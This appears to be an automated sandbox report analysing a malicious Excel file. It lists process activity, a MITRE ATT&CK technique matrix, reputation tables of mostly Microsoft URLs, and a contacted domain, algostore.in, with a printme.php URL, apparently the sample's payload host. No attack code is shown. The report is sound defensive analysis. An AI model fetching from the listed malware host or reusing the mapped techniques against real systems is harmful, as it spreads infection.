Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: rundll32.exe, 0000000F.00000002.297068867.00000000043F0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: rundll32.exe, 0000000F.00000002.297068867.00000000043F0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: rundll32.exe, 0000000F.00000002.297068867.00000000043F0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: rundll32.exe, 0000000F.00000002.297068867.00000000043F0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsScripting11Path InterceptionProcess Injection1Masquerading1OS Credential DumpingSecurity Software Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumNon-Application Layer Protocol1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsExploitation for Client Execution22Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryFile and Directory Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothApplication Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Rundll321Security Account ManagerSystem Information Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection1NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptScripting11LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

SourceDetectionScannerLabelLink
algostore.in0%VirustotalBrowse

URLs

SourceDetectionScannerLabelLink
https://cdn.entity.0%URL Reputationsafe
https://cdn.entity.0%URL Reputationsafe
https://cdn.entity.0%URL Reputationsafe
https://cdn.entity.0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://ofcrecsvcapi-int.azurewebsites.net/0%VirustotalBrowse
https://ofcrecsvcapi-int.azurewebsites.net/0%Avira URL Cloudsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://officeci.azurewebsites.net/api/0%Avira URL Cloudsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
http://www.algostore.in/algostoreold/printme.php0%Avira URL Cloudsafe
https://store.officeppe.com/addinstemplate0%URL Reputationsafe
https://store.officeppe.com/addinstemplate0%URL Reputationsafe
https://store.officeppe.com/addinstemplate0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://ncus.contentsync.0%URL Reputationsafe
https://ncus.contentsync.0%URL Reputationsafe
https://ncus.contentsync.0%URL Reputationsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://wus2.contentsync.0%URL Reputationsafe
https://wus2.contentsync.0%URL Reputationsafe
https://wus2.contentsync.0%URL Reputationsafe
https://asgsmsproxyapi.azurewebsites.net/0%Avira URL Cloudsafe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
https://ncus.pagecontentsync.0%URL Reputationsafe
https://ncus.pagecontentsync.0%URL Reputationsafe
https://ncus.pagecontentsync.0%URL Reputationsafe
https://skyapi.live.net/Activity/0%URL Reputationsafe
https://skyapi.live.net/Activity/0%URL Reputationsafe
https://skyapi.live.net/Activity/0%URL Reputationsafe
https://dataservice.o365filtering.com0%URL Reputationsafe
https://dataservice.o365filtering.com0%URL Reputationsafe
https://dataservice.o365filtering.com0%URL Reputationsafe
https://api.cortana.ai0%URL Reputationsafe
https://api.cortana.ai0%URL Reputationsafe
https://api.cortana.ai0%URL Reputationsafe
https://ovisualuiapp.azurewebsites.net/pbiagave/0%Avira URL Cloudsafe
https://directory.services.0%URL Reputationsafe
https://directory.services.0%URL Reputationsafe
https://directory.services.0%URL Reputationsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
algostore.in
103.212.121.53
truefalseunknown
www.algostore.in
unknown
unknowntrue
    unknown

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    https://api.diagnosticssdf.office.com31A18EA3-F8E4-459A-9527-8B83DF194053.0.drfalse
      high
      https://login.microsoftonline.com/31A18EA3-F8E4-459A-9527-8B83DF194053.0.drfalse
        high
        https://shell.suite.office.com:144331A18EA3-F8E4-459A-9527-8B83DF194053.0.drfalse
          high
          https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize31A18EA3-F8E4-459A-9527-8B83DF194053.0.drfalse
            high
            https://autodiscover-s.outlook.com/31A18EA3-F8E4-459A-9527-8B83DF194053.0.drfalse
              high
              https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr31A18EA3-F8E4-459A-9527-8B83DF194053.0.drfalse
                high
                https://cdn.entity.31A18EA3-F8E4-459A-9527-8B83DF194053.0.drfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                unknown
                https://api.addins.omex.office.net/appinfo/query31A18EA3-F8E4-459A-9527-8B83DF194053.0.drfalse
                  high
                  https://clients.config.office.net/user/v1.0/tenantassociationkey31A18EA3-F8E4-459A-9527-8B83DF194053.0.drfalse
                    high
                    https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/31A18EA3-F8E4-459A-9527-8B83DF194053.0.drfalse
                      high
                      https://powerlift.acompli.net31A18EA3-F8E4-459A-9527-8B83DF194053.0.drfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      https://rpsticket.partnerservices.getmicrosoftkey.com31A18EA3-F8E4-459A-9527-8B83DF194053.0.drfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      https://lookup.onenote.com/lookup/geolocation/v131A18EA3-F8E4-459A-9527-8B83DF194053.0.drfalse
                        high
                        https://cortana.ai31A18EA3-F8E4-459A-9527-8B83DF194053.0.drfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech31A18EA3-F8E4-459A-9527-8B83DF194053.0.drfalse
                          high
                          https://cloudfiles.onenote.com/upload.aspx31A18EA3-F8E4-459A-9527-8B83DF194053.0.drfalse
                            high
                            https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile31A18EA3-F8E4-459A-9527-8B83DF194053.0.drfalse
                              high
                              https://entitlement.diagnosticssdf.office.com31A18EA3-F8E4-459A-9527-8B83DF194053.0.drfalse
                                high
                                https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy31A18EA3-F8E4-459A-9527-8B83DF194053.0.drfalse
                                  high
                                  https://api.aadrm.com/31A18EA3-F8E4-459A-9527-8B83DF194053.0.drfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  https://ofcrecsvcapi-int.azurewebsites.net/31A18EA3-F8E4-459A-9527-8B83DF194053.0.drfalse
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies31A18EA3-F8E4-459A-9527-8B83DF194053.0.drfalse
                                    high
                                    https://api.microsoftstream.com/api/31A18EA3-F8E4-459A-9527-8B83DF194053.0.drfalse
                                      high
                                      https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive31A18EA3-F8E4-459A-9527-8B83DF194053.0.drfalse
                                        high
                                        https://cr.office.com31A18EA3-F8E4-459A-9527-8B83DF194053.0.drfalse
                                          high
                                          https://portal.office.com/account/?ref=ClientMeControl31A18EA3-F8E4-459A-9527-8B83DF194053.0.drfalse
                                            high
                                            https://ecs.office.com/config/v2/Office31A18EA3-F8E4-459A-9527-8B83DF194053.0.drfalse
                                              high
                                              https://graph.ppe.windows.net31A18EA3-F8E4-459A-9527-8B83DF194053.0.drfalse
                                                high
                                                https://res.getmicrosoftkey.com/api/redemptionevents31A18EA3-F8E4-459A-9527-8B83DF194053.0.drfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                unknown
                                                https://powerlift-frontdesk.acompli.net31A18EA3-F8E4-459A-9527-8B83DF194053.0.drfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                unknown
                                                https://tasks.office.com31A18EA3-F8E4-459A-9527-8B83DF194053.0.drfalse
                                                  high
                                                  https://officeci.azurewebsites.net/api/31A18EA3-F8E4-459A-9527-8B83DF194053.0.drfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://sr.outlook.office.net/ws/speech/recognize/assistant/work31A18EA3-F8E4-459A-9527-8B83DF194053.0.drfalse
                                                    high
                                                    https://store.office.cn/addinstemplate31A18EA3-F8E4-459A-9527-8B83DF194053.0.drfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://outlook.office.com/autosuggest/api/v1/init?cvid=31A18EA3-F8E4-459A-9527-8B83DF194053.0.drfalse
                                                      high
                                                      https://globaldisco.crm.dynamics.com31A18EA3-F8E4-459A-9527-8B83DF194053.0.drfalse
                                                        high
                                                        http://www.algostore.in/algostoreold/printme.phpupload_dreport_1364433.xls, 96B10000.0.drfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech31A18EA3-F8E4-459A-9527-8B83DF194053.0.drfalse
                                                          high
                                                          https://store.officeppe.com/addinstemplate31A18EA3-F8E4-459A-9527-8B83DF194053.0.drfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://dev0-api.acompli.net/autodetect31A18EA3-F8E4-459A-9527-8B83DF194053.0.drfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://www.odwebp.svc.ms31A18EA3-F8E4-459A-9527-8B83DF194053.0.drfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://api.powerbi.com/v1.0/myorg/groups31A18EA3-F8E4-459A-9527-8B83DF194053.0.drfalse
                                                            high
                                                            https://web.microsoftstream.com/video/31A18EA3-F8E4-459A-9527-8B83DF194053.0.drfalse
                                                              high
                                                              https://graph.windows.net31A18EA3-F8E4-459A-9527-8B83DF194053.0.drfalse
                                                                high
                                                                https://dataservice.o365filtering.com/31A18EA3-F8E4-459A-9527-8B83DF194053.0.drfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://officesetup.getmicrosoftkey.com31A18EA3-F8E4-459A-9527-8B83DF194053.0.drfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://analysis.windows.net/powerbi/api31A18EA3-F8E4-459A-9527-8B83DF194053.0.drfalse
                                                                  high
                                                                  https://prod-global-autodetect.acompli.net/autodetect31A18EA3-F8E4-459A-9527-8B83DF194053.0.drfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  https://outlook.office365.com/autodiscover/autodiscover.json31A18EA3-F8E4-459A-9527-8B83DF194053.0.drfalse
                                                                    high
                                                                    https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios31A18EA3-F8E4-459A-9527-8B83DF194053.0.drfalse
                                                                      high
                                                                      https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech31A18EA3-F8E4-459A-9527-8B83DF194053.0.drfalse
                                                                        high
                                                                        https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json31A18EA3-F8E4-459A-9527-8B83DF194053.0.drfalse
                                                                          high
                                                                          https://ncus.contentsync.31A18EA3-F8E4-459A-9527-8B83DF194053.0.drfalse
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false31A18EA3-F8E4-459A-9527-8B83DF194053.0.drfalse
                                                                            high
                                                                            https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/31A18EA3-F8E4-459A-9527-8B83DF194053.0.drfalse
                                                                              high
                                                                              http://weather.service.msn.com/data.aspx31A18EA3-F8E4-459A-9527-8B83DF194053.0.drfalse
                                                                                high
                                                                                https://apis.live.net/v5.0/31A18EA3-F8E4-459A-9527-8B83DF194053.0.drfalse
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                unknown
                                                                                https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks31A18EA3-F8E4-459A-9527-8B83DF194053.0.drfalse
                                                                                  high
                                                                                  https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios31A18EA3-F8E4-459A-9527-8B83DF194053.0.drfalse
                                                                                    high
                                                                                    https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml31A18EA3-F8E4-459A-9527-8B83DF194053.0.drfalse
                                                                                      high
                                                                                      https://management.azure.com31A18EA3-F8E4-459A-9527-8B83DF194053.0.drfalse
                                                                                        high
                                                                                        https://wus2.contentsync.31A18EA3-F8E4-459A-9527-8B83DF194053.0.drfalse
                                                                                        • URL Reputation: safe
                                                                                        • URL Reputation: safe
                                                                                        • URL Reputation: safe
                                                                                        unknown
                                                                                        https://incidents.diagnostics.office.com31A18EA3-F8E4-459A-9527-8B83DF194053.0.drfalse
                                                                                          high
                                                                                          https://clients.config.office.net/user/v1.0/ios31A18EA3-F8E4-459A-9527-8B83DF194053.0.drfalse
                                                                                            high
                                                                                            https://insertmedia.bing.office.net/odc/insertmedia31A18EA3-F8E4-459A-9527-8B83DF194053.0.drfalse
                                                                                              high
                                                                                              https://o365auditrealtimeingestion.manage.office.com31A18EA3-F8E4-459A-9527-8B83DF194053.0.drfalse
                                                                                                high
                                                                                                https://outlook.office365.com/api/v1.0/me/Activities31A18EA3-F8E4-459A-9527-8B83DF194053.0.drfalse
                                                                                                  high
                                                                                                  https://api.office.net31A18EA3-F8E4-459A-9527-8B83DF194053.0.drfalse
                                                                                                    high
                                                                                                    https://incidents.diagnosticssdf.office.com31A18EA3-F8E4-459A-9527-8B83DF194053.0.drfalse
                                                                                                      high
                                                                                                      https://asgsmsproxyapi.azurewebsites.net/31A18EA3-F8E4-459A-9527-8B83DF194053.0.drfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      https://clients.config.office.net/user/v1.0/android/policies31A18EA3-F8E4-459A-9527-8B83DF194053.0.drfalse
                                                                                                        high
                                                                                                        https://entitlement.diagnostics.office.com31A18EA3-F8E4-459A-9527-8B83DF194053.0.drfalse
                                                                                                          high
                                                                                                          https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json31A18EA3-F8E4-459A-9527-8B83DF194053.0.drfalse
                                                                                                            high
                                                                                                            https://outlook.office.com/31A18EA3-F8E4-459A-9527-8B83DF194053.0.drfalse
                                                                                                              high
                                                                                                              https://storage.live.com/clientlogs/uploadlocation31A18EA3-F8E4-459A-9527-8B83DF194053.0.drfalse
                                                                                                                high
                                                                                                                https://templatelogging.office.com/client/log31A18EA3-F8E4-459A-9527-8B83DF194053.0.drfalse
                                                                                                                  high
                                                                                                                  https://outlook.office365.com/31A18EA3-F8E4-459A-9527-8B83DF194053.0.drfalse
                                                                                                                    high
                                                                                                                    https://webshell.suite.office.com31A18EA3-F8E4-459A-9527-8B83DF194053.0.drfalse
                                                                                                                      high
                                                                                                                      https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive31A18EA3-F8E4-459A-9527-8B83DF194053.0.drfalse
                                                                                                                        high
                                                                                                                        https://management.azure.com/31A18EA3-F8E4-459A-9527-8B83DF194053.0.drfalse
                                                                                                                          high
                                                                                                                          https://login.windows.net/common/oauth2/authorize31A18EA3-F8E4-459A-9527-8B83DF194053.0.drfalse
                                                                                                                            high
                                                                                                                            https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile31A18EA3-F8E4-459A-9527-8B83DF194053.0.drfalse
                                                                                                                            • URL Reputation: safe
                                                                                                                            • URL Reputation: safe
                                                                                                                            • URL Reputation: safe
                                                                                                                            unknown
                                                                                                                            https://graph.windows.net/31A18EA3-F8E4-459A-9527-8B83DF194053.0.drfalse
                                                                                                                              high
                                                                                                                              https://api.powerbi.com/beta/myorg/imports31A18EA3-F8E4-459A-9527-8B83DF194053.0.drfalse
                                                                                                                                high
                                                                                                                                https://devnull.onenote.com31A18EA3-F8E4-459A-9527-8B83DF194053.0.drfalse
                                                                                                                                  high
                                                                                                                                  https://ncus.pagecontentsync.31A18EA3-F8E4-459A-9527-8B83DF194053.0.drfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  unknown
                                                                                                                                  https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json31A18EA3-F8E4-459A-9527-8B83DF194053.0.drfalse
                                                                                                                                    high
                                                                                                                                    https://messaging.office.com/31A18EA3-F8E4-459A-9527-8B83DF194053.0.drfalse
                                                                                                                                      high
                                                                                                                                      https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile31A18EA3-F8E4-459A-9527-8B83DF194053.0.drfalse
                                                                                                                                        high
                                                                                                                                        https://augloop.office.com/v231A18EA3-F8E4-459A-9527-8B83DF194053.0.drfalse
                                                                                                                                          high
                                                                                                                                          https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing31A18EA3-F8E4-459A-9527-8B83DF194053.0.drfalse
                                                                                                                                            high
                                                                                                                                            https://skyapi.live.net/Activity/31A18EA3-F8E4-459A-9527-8B83DF194053.0.drfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            unknown
                                                                                                                                            https://clients.config.office.net/user/v1.0/mac31A18EA3-F8E4-459A-9527-8B83DF194053.0.drfalse
                                                                                                                                              high
                                                                                                                                              https://dataservice.o365filtering.com31A18EA3-F8E4-459A-9527-8B83DF194053.0.drfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              unknown
                                                                                                                                              https://api.cortana.ai31A18EA3-F8E4-459A-9527-8B83DF194053.0.drfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              unknown
                                                                                                                                              https://onedrive.live.com31A18EA3-F8E4-459A-9527-8B83DF194053.0.drfalse
                                                                                                                                                high
                                                                                                                                                https://ovisualuiapp.azurewebsites.net/pbiagave/31A18EA3-F8E4-459A-9527-8B83DF194053.0.drfalse
                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                unknown
                                                                                                                                                https://visio.uservoice.com/forums/368202-visio-on-devices31A18EA3-F8E4-459A-9527-8B83DF194053.0.drfalse
                                                                                                                                                  high
                                                                                                                                                  https://directory.services.31A18EA3-F8E4-459A-9527-8B83DF194053.0.drfalse
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  unknown
                                                                                                                                                  https://login.windows-ppe.net/common/oauth2/authorize31A18EA3-F8E4-459A-9527-8B83DF194053.0.drfalse
                                                                                                                                                    high

                                                                                                                                                    Contacted IPs

                                                                                                                                                    • No. of IPs < 25%
                                                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                                                    • 75% < No. of IPs

                                                                                                                                                    Public

                                                                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                    103.212.121.53
                                                                                                                                                    algostore.inIndia
                                                                                                                                                    133296WEBWERKS-AS-INWebWerksIndiaPvtLtdINfalse

                                                                                                                                                    General Information

                                                                                                                                                    Joe Sandbox Version:31.0.0 Emerald
                                                                                                                                                    Analysis ID:384202
                                                                                                                                                    Start date:08.04.2021
                                                                                                                                                    Start time:18:36:17
                                                                                                                                                    Joe Sandbox Product:CloudBasic
                                                                                                                                                    Overall analysis duration:0h 5m 5s
                                                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                                                    Report type:full
                                                                                                                                                    Sample file name:upload_dreport_1364433.xls
                                                                                                                                                    Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                    Run name:Potential for more IOCs and behavior
                                                                                                                                                    Number of analysed new started processes analysed:33
                                                                                                                                                    Number of new started drivers analysed:0
                                                                                                                                                    Number of existing processes analysed:0
                                                                                                                                                    Number of existing drivers analysed:0
                                                                                                                                                    Number of injected processes analysed:0
                                                                                                                                                    Technologies:
                                                                                                                                                    • HCA enabled
                                                                                                                                                    • EGA enabled
                                                                                                                                                    • HDC enabled
                                                                                                                                                    • AMSI enabled
                                                                                                                                                    Analysis Mode:default
                                                                                                                                                    Analysis stop reason:Timeout
                                                                                                                                                    Detection:MAL
                                                                                                                                                    Classification:mal60.expl.evad.winXLS@3/7@1/1
                                                                                                                                                    EGA Information:Failed
                                                                                                                                                    HDC Information:Failed
                                                                                                                                                    HCA Information:
                                                                                                                                                    • Successful, ratio: 100%
                                                                                                                                                    • Number of executed functions: 0
                                                                                                                                                    • Number of non-executed functions: 0
                                                                                                                                                    Cookbook Comments:
                                                                                                                                                    • Adjust boot time
                                                                                                                                                    • Enable AMSI
                                                                                                                                                    • Found application associated with file extension: .xls
                                                                                                                                                    • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                    • Attach to Office via COM
                                                                                                                                                    • Scroll down
                                                                                                                                                    • Close Viewer
                                                                                                                                                    Warnings:
                                                                                                                                                    Show All
                                                                                                                                                    • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                                                                                                                    • Excluded IPs from analysis (whitelisted): 52.147.198.201, 13.64.90.137, 23.54.113.53, 52.109.76.68, 168.61.161.212, 52.109.12.24, 52.109.76.34, 95.100.54.203, 20.82.210.154, 23.10.249.26, 23.10.249.43, 20.50.102.62, 20.54.26.129, 104.83.87.75, 52.155.217.156
